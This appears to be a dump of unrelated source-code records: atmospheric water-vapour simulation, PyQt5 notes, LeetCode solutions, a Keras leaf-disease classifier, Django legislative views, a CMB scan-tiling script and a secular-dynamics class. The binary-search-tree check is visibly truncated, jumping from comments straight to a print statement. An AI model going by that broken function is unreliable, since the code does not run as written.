use_ARIS instance. 
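The number of strips read is ceil((time*windspeed + 2*separation) / grid / x_length_strip), capped at max_num_strips. 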
It loads\n        in the amount of atmosphere strips that it needs, converts it into a matrix\n        and then converts EPL to pwv.\n        \"\"\"\n        max_distance = (time*self.windspeed + 2*self.separation)\n        max_x_index = math.ceil(max_distance/self.grid)\n        num_strips = min(math.ceil(max_x_index/self.x_length_strip), self.max_num_strips)\n        grid_dif = int(round(self.separation/self.grid))\n        dEPL_size = int(round(self.beam_radius/self.grid))+2*grid_dif\n        #print('Number of atmosphere strips loaded: ', num_strips)\n        for i in range(num_strips):\n            filename = self.prefix_filename + (3-len(str(i))) * \"0\" + str(i)\n            d = np.loadtxt(self.sourcepath.joinpath(filename), dtype = float, delimiter=',', skiprows = 18)\n            if i == 0:\n                nx = int(max(d[:, 0])) + 1\n                ny = int(max(d[:, 1])) + 1\n                # print('nx: ', nx)\n                # print('ny: ', ny)\n            epl= np.zeros([nx,ny])\n            for j in range(len(d)):\n                epl[int(d[j, 0])-int(d[0, 0]), int(d[j, 1])] = int(d[j, 2])\n            if i == 0:\n                self.dEPL_matrix = epl[:, 0:dEPL_size]\n            else:\n                self.dEPL_matrix = np.concatenate((self.dEPL_matrix, epl[:, 0:dEPL_size]), axis = 0)\n        self.pwv_matrix = self.pwv_0 + (1/self.a * self.dEPL_matrix*1e-6)*1e3 #in mm\n        self.pwv_matrix = np.array(self.pwv_matrix)\n\n    def obt_pwv(self, time, count, windspeed):\n        \"\"\"Obtains the precipitable water vapor from the pwv_matrix at 6 different positions, to\n        make sky chopping and nodding possible in 2 directions.\n\n        Returns\n        ------------\n        pwv: array\n            precipitable water vapor at 6 different positions.\n            Unit: mm\n        \"\"\"\n        pwv_matrix = self.filtered_pwv_matrix\n        positions = self.calc_coordinates(time, windspeed)\n        pwv = np.array([pwv_matrix[positions[0]], pwv_matrix[positions[1]], pwv_matrix[positions[2]], pwv_matrix[positions[3]], pwv_matrix[positions[4]], pwv_matrix[positions[5]]])\n        return pwv\n\n    def calc_coordinates(self, time, windspeed):\n        \"\"\"Calculates the positions at which the pwv needs to be taken. 
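One beam separation corresponds to grid_dif = round(separation/grid) gridpoints. 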
Six\n        different positions are taken, to make sky chopping and nodding possible\n        in 2 directions.\n\n        Returns\n        ------------\n        Positions: array\n            The positions (gridpoints) at which the pwv needs to be taken.\n        \"\"\"\n        grid_dif = int(round(self.separation/self.grid)) #number of gridpoints difference between positions\n        distance = time*windspeed\n        x_index = (int(round(distance/self.grid)))\n        y_index = int(round(self.beam_radius/self.grid))+grid_dif - 1#int(23/self.grid)-1 #23m, the -1 is to be in accordance with python array indexing\n        pos_1 = x_index + grid_dif, y_index\n        pos_2 = x_index + grid_dif, y_index\n        pos_3 = x_index + grid_dif, y_index\n        pos_4 = x_index + grid_dif, y_index + grid_dif\n        pos_5 = x_index + grid_dif, y_index - grid_dif\n        pos_6 = x_index + grid_dif, y_index\n        positions = [pos_1, pos_2, pos_3, pos_4, pos_5, pos_6]\n        return positions\n","sub_path":"tiempo_deshima/Atmosphere/use_aris.py","file_name":"use_aris.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"43373258","text":"from PyQt5.Qt import *\nimport sys\n\napp = QApplication(sys.argv)\n\nwindow = QWidget()\nwindow.setWindowTitle(\"title\")\nwindow.resize(500, 500)\nwindow.show()\n\n\"\"\"\nQPushButton:\n    clicked by the user to trigger some action; usually rectangular\n    inherits from QAbstractButton\n\nCreation:\n    QPushButton()\n    QPushButton(parent)\n    QPushButton(text, parent)\n    QPushButton(icon, text, parent)\n\nMenu:\n    setMenu(QMenu): set the menu\n    menu(): get the menu\n    showMenu(): show the menu\n    QMenu():\n        addMenu(QMenu): add a submenu\n        addSeparator(): add a separator line\n        addAction(QAction): add an action\n        setTitle(str): set the title\n        setIcon(QIcon): set the icon\n    \n    QAction setup:\n        setText(str): set the text\n        setIcon(QIcon): set the icon\n        signal: triggered\nWhether the border stays flat:\n    setFlat(bool): default False; when True, most styles do not draw the button background unless the button is pressed\n    isFlat(): get whether the button border is currently flat\nDefault handling:\n    setAutoDefault(bool):\n        make this an auto-default button\n        in some GUI styles a default button is drawn with an extra frame around it, three pixels wide or more\n        Qt automatically keeps this space free around auto-default buttons, so an auto-default button may get a slightly larger size hint\n        for buttons with a QDialog parent this property defaults to True, otherwise it defaults to False\n    autoDefault()\n    setDefault(bool)\n    isDefault()\n\nSignals are mostly inherited from QAbstractButton and 002-QWidget\n\nCustom context-menu request signal: customContextMenuRequested(QPoint)\n    setContextMenuPolicy(Qt.CustomContextMenu)\n    Qt.DefaultContextMenu: calls the object's contextMenuEvent() method\n    Qt.CustomContextMenu: emits the signal\n\"\"\"\n\n\nsys.exit(app.exec_())\n\n","sub_path":"004-GUI编程/PyQt5/004-QPushButton/007-QPushButton.py","file_name":"007-QPushButton.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"156321678","text":"import sys\nimport threading\n\nsys.setrecursionlimit(10**7) # max depth of recursion\nthreading.stack_size(2**25) # new thread will get stack of such size\n\n\ndef IsBinarySearchTree(tree):\n    node_index = 0\n    curr_max = float(\"-inf\")\n    # in-order traversal, make sure the next visited value is greater than curr_max\n\n    if len(tree) <= 1:\n        return True\n    else:\n        # each node index is pushed twice: popping an index while its duplicate\n        # is still on top of the stack means \"descend into the left child first\";\n        # popping the second copy means \"visit the node, then go right\"\n        
print(\"INCORRECT\")\n\n\nthreading.Thread(target=main).start()\n","sub_path":"Data Structures/week6_binary_search_trees/2_is_bst.py","file_name":"2_is_bst.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"47391747","text":"import os, cv2\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras import backend as K\r\nimport matplotlib.pyplot as plt\r\nfrom keras.optimizers import Adam\r\ntrain_path = './lateblight_yellowleafcurl/train/'\r\ntest_path = './lateblight_yellowleafcurl/test/'\r\nclasses = [\"lateblight\", \"yellowleafcurl\"]\r\n\r\nnum_classes = len(classes) # 클래스=종속변수=label의 개수 -> 2개이므로 binary classification\r\nwidth = 32\r\nheight = 32\r\nchannel = 3\r\n\r\nX_train = [] # train 이미지\r\nY_train = [] # train label\r\nX_test = [] # test 이미지\r\nY_test = [] # test label\r\n\r\ndef load_image(paths, x_list, y_list, l):\r\n for top, dir, f in os.walk(paths):\r\n for filename in f:\r\n #print(paths + filename)\r\n img = cv2.imread(paths + filename)\r\n img = cv2.resize(img, (width, height), interpolation=cv2.INTER_AREA).flatten()\r\n x_list.append([np.array(img).astype('float32')])\r\n y_list.append(l)\r\n\r\nfor idx, label in enumerate(classes):\r\n labeling = [0 for i in range(num_classes)]\r\n labeling[idx] = 1\r\n train_image = train_path + label + \"/\"\r\n test_image = test_path + label + \"/\"\r\n\r\n load_image(train_image, X_train, Y_train, labeling) # train 이미지 로드\r\n load_image(test_image, X_test, Y_test, labeling) # test 이미지 로드\r\n\r\n# 픽셀 1개는 1byte 사용 = 8비트 = 256가지를 표현 가능 -> 256으로 나눠서 0~1 사이의 값으로 표현\r\n# RGB 세가지가 있으므로 256X256X256가지의 색상을 표현 가능\r\nX_train = np.vstack(X_train) / 256.0\r\nY_train = np.array(Y_train).astype('float32')\r\nX_test = np.vstack(X_test) / 256.0\r\nY_test = np.array(Y_test).astype('float32')\r\n\r\nprint(X_train.shape) # (11896,3072) -> 11896 = trainset의 개수 (bacteria : 6808, healthy: 5088), 3072 = 특징의 개수 = 32(=이미지 너비) * 32(=이미지 높이) * 3(=RGB값)\r\nprint(Y_train.shape) # (11896,2) -> 2 = label의 개수(bacteria, healthy)\r\nprint(X_test.shape) # (2972.3072) ->2972 = trainset의 개수\r\nprint(Y_test.shape) # (2972,2)\r\n\r\ndef logistic_model(input_dim, output_dim):\r\n model = Sequential()\r\n model.add(Dense(output_dim, input_dim=input_dim,activation='sigmoid'))\r\n return model\r\n\r\nbatch_size = 100\r\nepoch = 50\r\nnum_label =2\r\ninput_dim = 32*32*3\r\n\r\nmodel = logistic_model(input_dim,num_label)\r\nmodel.summary()\r\n\r\ndef precision_threshold(threshold=0.5):\r\n def precision(y_true, y_pred):\r\n \"\"\"Precision metric.\r\n Computes the precision over the whole batch using threshold_value.\r\n \"\"\"\r\n threshold_value = threshold\r\n # Adaptation of the \"round()\" used before to get the predictions. Clipping to make sure that the predicted raw values are between 0 and 1.\r\n y_pred = K.cast(K.greater(K.clip(y_pred, 0, 1), threshold_value), K.floatx())\r\n # Compute the number of true positives. 
Rounding in prevention to make sure we have an integer.\r\n true_positives = K.round(K.sum(K.clip(y_true * y_pred, 0, 1)))\r\n # count the predicted positives\r\n predicted_positives = K.sum(y_pred)\r\n # Get the precision ratio\r\n precision_ratio = true_positives / (predicted_positives + K.epsilon())\r\n return precision_ratio\r\n return precision\r\n\r\ndef recall_threshold(threshold = 0.5):\r\n def recall(y_true, y_pred):\r\n \"\"\"Recall metric.\r\n Computes the recall over the whole batch using threshold_value.\r\n \"\"\"\r\n threshold_value = threshold\r\n # Adaptation of the \"round()\" used before to get the predictions. Clipping to make sure that the predicted raw values are between 0 and 1.\r\n y_pred = K.cast(K.greater(K.clip(y_pred, 0, 1), threshold_value), K.floatx())\r\n # Compute the number of true positives. Rounding in prevention to make sure we have an integer.\r\n true_positives = K.round(K.sum(K.clip(y_true * y_pred, 0, 1)))\r\n # Compute the number of positive targets.\r\n possible_positives = K.sum(K.clip(y_true, 0, 1))\r\n recall_ratio = true_positives / (possible_positives + K.epsilon())\r\n return recall_ratio\r\n return recall\r\n\r\noptimizer = Adam(lr=0.001)\r\nmodel.compile(optimizer=optimizer, loss='binary_crossentropy',metrics=['accuracy',precision_threshold(0.5),recall_threshold(0.5)]) #optimizer를 adam으로도 바꿔보자\r\nhistory = model.fit(X_train, Y_train, batch_size=batch_size, epochs=epoch, verbose=1)\r\n\r\nplt.plot(history.history['loss'],label='loss')\r\nplt.xlabel('epoch')\r\nplt.title('lateblight_yellowleafcurl')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\nplt.plot(history.history['acc'],label='accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\nplt.plot(history.history['precision'],label='precision')\r\nplt.xlabel('epoch')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\nplt.plot(history.history['recall'],label='recall')\r\nplt.xlabel('epoch')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\n\r\njson_string = model.to_json()\r\nopen('./lateblight_yellowleafcurl/weight/'+str(epoch)+'/lateblight_yellowleafcurl.json','w').write(json_string)\r\nmodel.save_weights('./lateblight_yellowleafcurl/weight/'+str(epoch)+'/lateblight_yellowleafcurl.h5')\r\nprint('model save')","sub_path":"OVO/lateblight_yellowleafcurl.py","file_name":"lateblight_yellowleafcurl.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251112507","text":"# 给定一个可包含重复数字的序列,返回所有不重复的全排列。 \n# \n# 示例: \n# \n# 输入: [1,1,2]\n# 输出:\n# [\n# [1,1,2],\n# [1,2,1],\n# [2,1,1]\n# ] \n# Related Topics 回溯算法 \n# 👍 384 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n nums.sort()\n res = []\n def dfs(nums, ans):\n if not nums:\n res.append(ans)\n return\n for i in range(len(nums)):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n dfs(nums[:i] + nums[i+1:], ans + [nums[i]])\n dfs(nums, [])\n return res\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_03/[47]全排列 II.py","file_name":"[47]全排列 II.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503597362","text":"\"\"\"\n views that are specific to a state/region\n\"\"\"\nimport re\nimport urllib\nfrom collections import defaultdict\n\nfrom django.shortcuts import redirect, render\nfrom 
django.http import Http404\nfrom django.conf import settings\nfrom django.template.defaultfilters import striptags\n\nfrom billy.models import db, Metadata, DoesNotExist, Bill\nfrom billy.models.pagination import CursorPaginator\nfrom ..forms import get_state_select_form\nfrom .utils import templatename, ListViewBase\n\n\ndef state_selection(request):\n '''Handle submission of the state selection form\n in the base template.\n '''\n form = get_state_select_form(request.GET)\n abbr = form.data.get('abbr')\n if not abbr or len(abbr) != 2:\n return redirect('homepage')\n return redirect('state', abbr=abbr)\n\n\ndef state(request, abbr):\n report = db.reports.find_one({'_id': abbr})\n try:\n meta = Metadata.get_object(abbr)\n except DoesNotExist:\n raise Http404\n\n # count legislators\n legislators = meta.legislators({'active': True}, {'party': True,\n 'chamber': True})\n # Maybe later, mapreduce instead?\n party_counts = defaultdict(lambda: defaultdict(int))\n for leg in legislators:\n if 'chamber' in leg: # if statement to exclude lt. governors\n party_counts[leg['chamber']][leg['party']] += 1\n\n if 'lower_chamber_name' not in meta:\n chambers_to_use = ('upper',)\n else:\n chambers_to_use = ('upper', 'lower')\n\n chambers = []\n\n for chamber in chambers_to_use:\n res = {}\n\n # chamber metadata\n res['type'] = chamber\n res['title'] = meta[chamber + '_chamber_title']\n res['name'] = meta[chamber + '_chamber_name']\n\n # legislators\n res['legislators'] = {\n 'count': sum(party_counts[chamber].values()),\n 'party_counts': dict(party_counts[chamber]),\n }\n\n # committees\n res['committees_count'] = meta.committees({'chamber': chamber}).count()\n\n res['latest_bills'] = meta.bills({'chamber': chamber}).sort(\n [('action_dates.first', -1)]).limit(2)\n res['passed_bills'] = meta.bills({'chamber': chamber}).sort(\n [('action_dates.passed_' + chamber, -1)]).limit(2)\n\n chambers.append(res)\n\n joint_committee_count = meta.committees({'chamber': 'joint'}).count()\n\n # add bill counts to session listing\n sessions = meta.sessions()\n for s in sessions:\n try:\n s['bill_count'] = (\n report['bills']['sessions'][s['id']]['upper_count']\n + report['bills']['sessions'][s['id']]['lower_count'])\n except KeyError:\n # there's a chance that the session had no bills\n s['bill_count'] = 0\n\n return render(request, templatename('state'),\n dict(abbr=abbr, metadata=meta, sessions=sessions,\n chambers=chambers,\n joint_committee_count=joint_committee_count,\n statenav_active='home'))\n\n\ndef not_active_yet(request, args, kwargs):\n try:\n metadata = Metadata.get_object(kwargs['abbr'])\n except DoesNotExist:\n raise Http404\n\n return render(request, templatename('state_not_active_yet'),\n dict(metadata=metadata, statenav_active=None))\n\n\ndef search(request, abbr):\n\n if not request.GET:\n return render(request, templatename('search_results_no_query'),\n {'abbr': abbr})\n\n search_text = request.GET['search_text']\n\n # First try to get by bill_id.\n if re.search(r'\\d', search_text):\n url = '/%s/bills?' 
% abbr\n url += urllib.urlencode([('search_text', search_text)])\n return redirect(url)\n\n else:\n found_by_id = False\n if settings.ENABLE_ELASTICSEARCH:\n kwargs = {}\n if abbr != 'all':\n kwargs['state'] = abbr\n bill_results = Bill.search(search_text, **kwargs)\n else:\n spec = {'title': {'$regex': search_text, '$options': 'i'}}\n if abbr != 'all':\n spec.update(state=abbr)\n bill_results = db.bills.find(spec)\n\n # add sorting\n bill_results = bill_results.sort([('action_dates.last', -1)])\n\n # Limit the bills if it's a search.\n more_bills_available = (5 < bill_results.count())\n bill_results = bill_results.limit(5)\n\n # See if any legislator names match.\n spec = {'full_name': {'$regex': search_text, '$options': 'i'}}\n if abbr != 'all':\n spec.update(state=abbr)\n legislator_results = db.legislators.find(spec)\n more_legislators_available = (5 < legislator_results.count())\n legislator_results = legislator_results.limit(5)\n\n if abbr != 'all':\n metadata = Metadata.get_object(abbr)\n else:\n metadata = None\n\n return render(request, templatename('search_results_bills_legislators'),\n dict(search_text=search_text,\n abbr=abbr,\n metadata=metadata,\n found_by_id=found_by_id,\n bill_results=bill_results,\n more_bills_available=more_bills_available,\n legislators_list=legislator_results,\n more_legislators_available=more_legislators_available,\n bill_column_headers=('State', 'Title', 'Session', 'Introduced',\n 'Recent Action',),\n rowtemplate_name=templatename('bills_list_row_with'\n '_state_and_session'),\n show_chamber_column=True,\n statenav_active=None))\n\n\nclass ShowMoreLegislators(ListViewBase):\n template_name = templatename('object_list')\n rowtemplate_name = templatename('legislators_list_row')\n statenav_active = None\n column_headers = ('', 'State', 'Name', 'District', 'Party', 'Chamber')\n use_table = True\n description_template = '''\n {{metadata.name}}\n legislator names containing \"{{request.GET.search_text}}\"'''\n title_template = striptags(description_template)\n\n def get_queryset(self):\n abbr = self.kwargs['abbr']\n search_text = self.request.GET['search_text']\n\n # See if any legislator names match.\n spec = {'full_name': {'$regex': search_text, '$options': 'i'}}\n if abbr != 'all':\n spec.update(state=abbr)\n legislator_results = db.legislators.find(spec)\n return CursorPaginator(legislator_results, show_per_page=10,\n page=int(self.request.GET.get('page', 1)))\n","sub_path":"billy/web/public/views/region.py","file_name":"region.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80361817","text":"from collections import Counter\nclass Solution:\n def findAnagrams(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: List[int]\n \"\"\"\n res=[]\n pCounter=Counter(p)\n sCounter=Counter(s[0:len(p)-1])\n for i in range(len(p)-1,len(s)):\n sCounter[s[i]] += 1\n if sCounter == pCounter :\n res.append(i-len(p)+1)\n headLetter = s[i-len(p)+1]\n sCounter[headLetter]-=1\n if sCounter[headLetter] == 0:\n del sCounter[headLetter]\n return res\n \n \n ","sub_path":"Find All Anagrams in a String.py","file_name":"Find All Anagrams in a String.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"162801315","text":"import numpy as np\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n\nimport healpy as hp\n\nsys.path.append(\"..\")\nfrom plug_holes import 
plug_holes\n\ndec_min = -70\ndec_max = 70\ndec_step = 20\ndec_overlap = 5\nra_step = 10\nra_overlap = 5\n\n# Number of discrete colors to use in plotting\n# intensity and polarization amplitude\nnbin = 10\n# fwhm, tlim, plim = 10, 300 * 1e-6, 1 * 1e-7\nfwhm, tlim, plim = 1, 500 * 1e-6, 2 * 1e-7\nlmax = 512\n\nwpatch = 10\nhpatch = 20\n\n# south_tier_ranges = [(60, 30), (75, 0), (100, -65)] # Tier 1, 2, 3\nsouth_tier_ranges = [(70, 20), (85, -10), (100, -65)] # Tier 1, 2, 3\n# north_tier_ranges = [(165, 135), (175, 125), (230, 110)] # Tier 1, 2, 3\nnorth_tier_ranges = [(175, 125), (185, 115), (230, 110)] # Tier 1, 2, 3\n\n\ndef get_tier(left, right):\n tier = 4\n for ranges in [south_tier_ranges, north_tier_ranges]:\n for i, lims in enumerate(ranges):\n if left <= lims[0] and right >= lims[1]:\n return i + 1\n return tier\n\n\nsouth_left = 100\nsouth_top = [\n # Tier 3\n -15, # 100\n -15,\n # Tier 2\n -20, # 90\n -20,\n -25, # 80\n # Tier 1\n -25,\n -30, # 70\n -30,\n -30, # 60\n # Tier 2\n -35,\n -35, # 50\n -35,\n -30, # 40\n -35,\n -35, # 30\n -35,\n -35, # 20\n # Tier 3\n -30,\n -30, # 10\n -25,\n -25, # 0,\n -25,\n -20, # -10\n -20,\n -15, # -20\n -15,\n -15, # -30\n -10,\n -5, # -40\n 0,\n 5, # -50\n 5,\n]\n\nnorth_left = 230\nnorth_top = [\n # Tier 3\n -20, # 230\n -25,\n -25, # 220\n -25,\n -25, # 210\n -25,\n -25, # 200\n -20,\n -10, # 190\n 0,\n 10, # 180\n 10,\n # Tier 2\n 10, # 170\n # Tier 1\n 15,\n 10, # 160\n 5,\n 10, # 150\n 10,\n # Tier 2\n 15, # 140\n 15,\n 20, # 130\n 20,\n # Tier 3\n 20, # 120\n]\n\"\"\"\n# left, top, right, bottom\nprimary_south = [80, -30, 30, -50]\nprimary_north = [175, 10, 135, -10]\n\nsecondary_south = [95, -10, 15, -60]\nsecondary_north = [180, 40, 125, -20]\n\ntertiary_south = [100, -20, -60, -40]\ntertiary_north = [210, 20, 110, 0]\n\"\"\"\n\n# target_top = -30\n# target_bottom = -50\n# target_left = 60\n# target_right = 330\n\nnside = 512\nnpix = 12 * nside ** 2\n\nhfi_pipe = \"/global/cfs/cdirs/cmb/data/planck2020/npipe/aux\"\nsky_model_cache = \"/global/cfs/cdirs/cmb/data/planck2020/npipe/npipe6v20_sim/skymodel_cache\"\nfn_sync = f\"{sky_model_cache}/sky_model_070GHz_nside1024_quickpol_cfreq_zodi.fits\"\nfn_dust = f\"{sky_model_cache}/sky_model_143GHz_nside2048_quickpol_cfreq_zodi.fits\"\nfn_mask = f\"{hfi_pipe}/psmask_030_nest.fits\"\nfn_cmb = f\"{hfi_pipe}/COM_CMB_IQU-commander_1024_R2.02_full.fits\"\nmask = hp.read_map(fn_mask, nest=True)\nnside_mask = hp.get_nside(mask)\ncmb = hp.read_map(fn_cmb, nest=True)\n\nplt.figure(figsize=[18, 8])\nplt.suptitle(\"fwhm = {} deg, nbin = {}\".format(fwhm, nbin))\n\n\ndef get_p(fn, cmb, psmask, fwhm, tlim, plim):\n \"\"\"\n Return the intensity and polarization amplitude\n of the file in Galactic and Equatorial coordinates\n\n The maps is first CMB-subtracted. 
Outputs are\n smoothed to `fwhm` [degrees]\n \"\"\"\n nside_cmb = hp.get_nside(cmb)\n m_gal = hp.read_map(fn, range(3), nest=True)\n # Subtract CMB\n m_gal = hp.ud_grade(m_gal, nside_cmb, order_in=\"NEST\")\n m_gal[0] -= cmb\n # Mask out point sources\n nside_mask = hp.get_nside(psmask)\n m_gal = hp.ud_grade(m_gal, nside_mask, order_in=\"NEST\")\n m_gal[:, mask == 0] = hp.UNSEEN\n plug_holes(m_gal, nest=True, in_place=True, verbose=True)\n # Smooth to FWHM\n m_gal = hp.ud_grade(m_gal, 512, order_in=\"NEST\", order_out=\"RING\")\n m_gal = hp.smoothing(m_gal, fwhm=np.radians(fwhm), lmax=lmax, iter=0)\n # Set zero point\n i_gal = m_gal[0] - np.amin(m_gal[0])\n # Measure polarization amplitude\n p_gal = np.sqrt(m_gal[1] ** 2 + m_gal[2] ** 2)\n # Saturate the color scale\n i_gal[i_gal < tlim] = 0\n p_gal[p_gal < plim] = 0\n # Rotate and interpolate to equatorial coordinates\n i_equ = np.zeros(npix)\n p_equ = np.zeros(npix)\n rot = hp.Rotator(coord=\"CG\")\n buflen = 1024\n for pix_start in range(0, npix, buflen):\n pix_stop = min(npix, pix_start + buflen)\n pix = np.arange(pix_start, pix_stop)\n vec_equ = hp.pix2vec(nside, pix)\n vec_gal = rot(vec_equ)\n theta, phi = hp.vec2dir(vec_gal)\n ival = hp.get_interp_val(i_gal, theta, phi)\n pval = hp.get_interp_val(p_gal, theta, phi)\n i_equ[pix] = ival\n p_equ[pix] = pval\n return i_gal, p_gal, i_equ, p_equ\n\n\nisync_gal, psync_gal, isync_equ, psync_equ = get_p(fn_sync, cmb, mask, fwhm, tlim, plim)\nidust_gal, pdust_gal, idust_equ, pdust_equ = get_p(fn_dust, cmb, mask, fwhm, tlim, plim)\n\n\ndef plot_p(maps, sub, title, nbin, coord, gr=30):\n \"\"\"\n Plot the given map using only `nbin` distinct colors\n If `maps` contains several maps, the plotting color is\n chosen based on the most intense map: if any of the given\n \"\"\"\n sorted_maps = [np.sort(m) for m in maps]\n lims = np.arange(nbin) / nbin\n p = np.zeros(npix)\n for ilim, lim in enumerate(lims):\n for m, msorted in zip(maps, sorted_maps):\n val = msorted[int(npix * lim)]\n p[m > val] = lim\n hp.mollview(p, xsize=2400, sub=sub, title=title, coord=coord, cmap=\"bwr\")\n hp.graticule(gr)\n return p\n\n\nplot_p([isync_gal], [2, 4, 1], \"070GHz I\", nbin, \"G\")\nplot_p([psync_gal], [2, 4, 2], \"070GHz P\", nbin, \"G\")\nplot_p([idust_gal], [2, 4, 3], \"150GHz I\", nbin, \"G\")\nplot_p([pdust_gal], [2, 4, 4], \"150GHz P\", nbin, \"G\")\n\nplot_p([isync_equ], [2, 4, 5], \"070GHz I\", nbin, \"C\")\nplot_p([psync_equ], [2, 4, 6], \"070GHz P\", nbin, \"C\")\nplot_p([idust_equ], [2, 4, 7], \"150GHz I\", nbin, \"C\")\nplot_p([pdust_equ], [2, 4, 8], \"150GHz P\", nbin, \"C\")\n\nplt.savefig(\"priority_by_pixel_fwhm{:02}_nbin{:02}.comp.png\".format(fwhm, nbin))\n\nplt.figure(figsize=[18, 6])\nplt.suptitle(\"fwhm = {} deg, nbin = {}\".format(fwhm, nbin))\n\nplot_p(\n [isync_gal, psync_gal, idust_gal, pdust_gal],\n [1, 2, 1],\n \"070+150GHz\",\n nbin,\n \"G\",\n gr=15,\n)\npmap = plot_p(\n [isync_equ, psync_equ, idust_equ, pdust_equ],\n [1, 2, 2],\n \"070+150GHz\",\n nbin,\n \"C\",\n gr=15,\n)\n\n\ndef plot_patch(patch, tier):\n left, top, right, bottom = patch\n color, lw = [(\"red\", 3), (\"black\", 2), (\"grey\", 2)][tier - 1]\n lon = [left, left, right, right, left]\n lat = [bottom, top, top, bottom, bottom]\n n = len(lon)\n x = np.arange(n) / (n - 1)\n xfull = np.linspace(0, 1, 100 * n)\n lonfull = np.interp(xfull, x, lon)\n latfull = np.interp(xfull, x, lat)\n hp.projplot(\n lonfull,\n latfull,\n \"-\",\n threshold=1,\n lonlat=True,\n color=color,\n lw=lw,\n alpha=0.8,\n coord=\"C\",\n zorder=(4 - 
tier) * 100,\n )\n\n\ndef add_patch(fout, patch, tier, mult=1):\n ra_stop, dec_start, ra_start, dec_stop = patch\n if ra_start < 0:\n ra_start += 360\n if ra_stop < 0:\n ra_stop += 360\n name = \"Tier{}DEC{:+04}..{:+04}_RA{:+04}..{:+04}\".format(\n tier, dec_start, dec_stop, ra_start, ra_stop\n )\n priority = [1, 1000, 1000000][tier - 1] * mult\n fout.write(\"--patch\\n\")\n fout.write(\n \"{}-1,{:.3f},{:.3f},{:.3f},{:.3f},{:.3f}\\n\".format(\n name, priority, ra_start, dec_stop, ra_stop, dec_start\n )\n )\n # Add additional tiles to achieve SAT-like apodization with LAT\n fout.write(\"--patch\\n\")\n fout.write(\n \"{}-2,{:.3f},{:.3f},{:.3f},{:.3f},{:.3f}\\n\".format(\n name, priority, ra_start, dec_stop+5, ra_stop, dec_start+5\n )\n )\n #fout.write(\"--patch\\n\")\n #fout.write(\n # \"{}-3,{:.3f},{:.3f},{:.3f},{:.3f},{:.3f}\\n\".format(\n # name, priority, ra_start, dec_stop+10, ra_stop, dec_start+10\n # )\n #)\n\n\nwith open(\"patches_lat.txt\", \"w\") as fout:\n left = south_left\n for top in south_top:\n tier = get_tier(left, left - wpatch)\n patch = [left, top, left - wpatch, top - hpatch]\n plot_patch(patch, tier)\n add_patch(fout, patch, tier, mult=1)\n left -= 5\n\n left = north_left\n for top in north_top:\n tier = get_tier(left, left - wpatch)\n patch = [left, top, left - wpatch, top - hpatch]\n plot_patch(patch, tier)\n add_patch(fout, patch, tier, mult=10)\n left -= 5\n\nplt.savefig(\"priority_by_pixel_fwhm{:02}_nbin{:02}.full.png\".format(fwhm, nbin))\n","sub_path":"AoA/scan_strategies/chlat_for_chsat_s4/make_lat_tiles.py","file_name":"make_lat_tiles.py","file_ext":"py","file_size_in_byte":8403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"246186020","text":"import numpy as np\nimport warnings\nfrom . import Poincare\nfrom sympy import symbols, S, binomial, summation, sqrt, cos, sin, atan2, expand_trig,diff,Matrix\nfrom .disturbing_function import DFCoeff_C,eval_DFCoeff_dict,get_DFCoeff_symbol\nfrom scipy.linalg import expm\nfrom .poincare import single_true\n\n_rt2 = np.sqrt(2)\n_rt2_inv = 1. / _rt2 \n_machine_eps = np.finfo(np.float64).eps\n\nclass LaplaceLagrangeSystem(Poincare):\n r\"\"\"\n A class for representing the classical Laplace-Lagrange secular\n solution for a planetary system.\n \n Attributes\n ----------\n eccentricity_matrix : sympy.Matrix\n The matrix :math:`\\pmb{S}_e` appearing in the secular equations\n of motion for the eccentricity variables, \n\n .. math::\n \\frac{d}{dt}(\\eta_i + i\\kappa_i) = [\\pmb{S}_e]_{ij} (\\eta_j + i\\kappa_j)~.\n \n or, equivalently,\n\n .. math::\n \\frac{d}{dt}\\pmb{x} = -i \\pmb{S}_e \\cdot \\pmb{x}\n\n The matrix is given in symbolic form.\n inclination_matrix : sympy.Matrix\n The matrix :math:`\\pmb{S}_I` appearing in the secular equations\n of motion for the eccentricity variables, \n\n .. math::\n \\frac{d}{dt}(\\rho_i + i \\sigma_i ) =[\\pmb{S}_I]_{ij} (\\rho_j + i \\sigma_j)~.\n \n or, equivalently,\n\n .. 
